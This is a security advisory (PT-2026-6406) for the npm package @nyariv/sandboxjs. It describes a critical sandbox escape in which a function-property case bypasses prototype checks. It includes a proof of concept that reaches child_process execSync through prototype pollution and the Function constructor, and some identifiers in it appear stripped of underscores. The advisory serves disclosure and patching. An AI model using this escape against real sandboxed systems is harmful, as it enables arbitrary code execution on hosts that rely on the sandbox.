PT-2026-6406 — @Nyariv/Sandboxjs

PT-2026-6406 · Npm · @Nyariv/Sandboxjs

Published

2026-02-02

Updated

2026-02-02

CVSS v3.1

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Summary

SandboxJS does not properly restrict lookupGetter which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains lookupGetter is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
let getProto = Object.toString. lookupGetter (" proto ")
let m = getProto.call(new Map());
m.has = isFinite;

console.log(
 isFinite.constructor(
  "return process.getBuiltinModule('child process').execSync('ls -lah').toString()",
 )(),
);`
sb.compile(payload)().run();

Impact

Prototype Pollution -> RCE

Fix

Code Injection

Prototype Pollution

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94CWE-1321

Related Identifiers

GHSA-9P4W-FQ8M-2HP7

Affected Products

@Nyariv/Sandboxjs